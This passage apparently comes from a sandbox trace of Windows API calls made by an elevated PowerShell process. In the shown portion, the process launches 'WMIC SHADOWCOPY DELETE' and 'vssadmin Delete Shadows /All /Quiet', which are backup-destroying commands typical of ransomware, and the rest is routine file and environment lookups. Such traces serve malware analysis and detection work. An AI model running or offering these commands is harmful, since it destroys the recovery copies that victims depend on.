fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0250.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0250.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0250.459] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0250.460] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0250.460] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1bd60 [0250.465] FindNextFileW (in: hFindFile=0x7e1bd60, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.465] FindClose (in: hFindFile=0x7e1bd60 | out: hFindFile=0x7e1bd60) returned 1 [0250.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0250.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0250.474] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0250.478] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0250.478] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0250.478] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0250.485] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0250.505] GetConsoleWindow () returned 0x302b8 [0250.512] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0250.527] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0250.532] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x8b0dfa0, nSize=0xbc | out: lpBuffer="抈琉") returned 0x0 [0250.533] CoTaskMemAlloc (cb=0x804) returned 0x7e291c8 [0250.533] GetConsoleTitleW (in: lpConsoleTitle=0x7e291c8, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0250.534] CoTaskMemFree (pv=0x7e291c8) [0250.537] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" SHADOWCOPY DELETE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e748*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4d9dce4 | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" SHADOWCOPY DELETE", lpProcessInformation=0x4d9dce4*(hProcess=0x87c, hThread=0x878, dwProcessId=0x55c, dwThreadId=0x1298)) returned 1 [0250.569] CloseHandle (hObject=0x878) returned 1 [0250.569] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0250.571] GetCurrentProcess () returned 0xffffffff [0250.571] GetCurrentProcess () returned 0xffffffff [0250.571] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x87c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0x878) returned 1 [0250.572] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0x878, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0256.311] CloseHandle (hObject=0x878) returned 1 [0256.313] GetExitCodeProcess (in: hProcess=0x87c, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x80041014) returned 1 [0256.317] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0256.334] CloseHandle (hObject=0x87c) returned 1 [0256.335] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.340] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.341] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.343] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.343] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.344] SetEvent (hEvent=0x82c) returned 1 [0256.344] SetEvent (hEvent=0x820) returned 1 [0256.344] SetEvent (hEvent=0x824) returned 1 [0256.344] SetEvent (hEvent=0x828) returned 1 [0256.360] SetEvent (hEvent=0x83c) returned 1 [0256.360] SetEvent (hEvent=0x830) returned 1 [0256.360] SetEvent (hEvent=0x834) returned 1 [0256.360] SetEvent (hEvent=0x838) returned 1 [0256.362] SetEvent (hEvent=0x844) returned 1 [0256.362] SetEvent (hEvent=0x840) returned 1 [0256.364] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0256.370] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0256.376] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0xfd8f1ebe, Data2=0x4137, Data3=0x4086, Data4=([0]=0xbb, [1]=0xce, [2]=0xae, [3]=0x9b, [4]=0x4, [5]=0x9e, [6]=0xa9, [7]=0x33))) returned 0x0 [0256.378] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=35141273296) returned 1 [0256.378] AmsiOpenSession () returned 0x0 [0256.378] AmsiScanString () returned 0x80070015 [0256.396] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=35143074097) returned 1 [0256.397] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0256.397] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x12, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.397] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.398] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x12, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x12, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.398] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x13, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.398] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x12, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.398] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x13, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x13, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.399] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="筈濲ࢰࢰ뼫玢筈濲欼玢筈濲ࢰ") returned 0x0 [0256.400] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0256.402] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0256.403] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0256.408] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0256.409] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0256.409] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0256.409] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0256.409] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0256.409] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0256.409] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0256.410] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0256.410] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0256.410] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\vssadmin.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0256.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0256.411] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0256.411] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0256.411] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0256.411] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0256.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0256.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0256.412] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0256.412] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0256.412] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b6c03f7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6b6c03f7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6b6c03f7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1ae00, dwReserved0=0x0, dwReserved1=0x0, cFileName="vssadmin.exe", cAlternateFileName="")) returned 0x7e1c020 [0256.416] FindNextFileW (in: hFindFile=0x7e1c020, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.416] FindClose (in: hFindFile=0x7e1c020 | out: hFindFile=0x7e1c020) returned 1 [0256.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0256.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0256.419] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe")) returned 0x20 [0256.420] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x14, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.420] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x13, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.420] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x14, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x14, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.421] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\system32\\vssadmin.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0256.448] GetConsoleWindow () returned 0x302b8 [0256.453] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0256.455] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0256.460] CoTaskMemAlloc (cb=0x804) returned 0x7e29450 [0256.460] GetConsoleTitleW (in: lpConsoleTitle=0x7e29450, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0256.462] CoTaskMemFree (pv=0x7e29450) [0256.462] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\system32\\vssadmin.exe\" Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e74c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4dac230 | out: lpCommandLine="\"C:\\WINDOWS\\system32\\vssadmin.exe\" Delete Shadows /All /Quiet", lpProcessInformation=0x4dac230*(hProcess=0x8bc, hThread=0x8b8, dwProcessId=0xa10, dwThreadId=0x4f8)) returned 1 [0256.491] CloseHandle (hObject=0x8b8) returned 1 [0256.491] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\system32\\vssadmin.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0256.492] GetCurrentProcess () returned 0xffffffff [0256.492] GetCurrentProcess () returned 0xffffffff [0256.492] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x8bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0x8b8) returned 1 [0256.492] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0x8b8, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0256.793] CloseHandle (hObject=0x8b8) returned 1 [0256.794] GetExitCodeProcess (in: hProcess=0x8bc, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x2) returned 1 [0256.794] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0256.798] CloseHandle (hObject=0x8bc) returned 1 [0256.798] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x14, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.798] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x14, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.798] 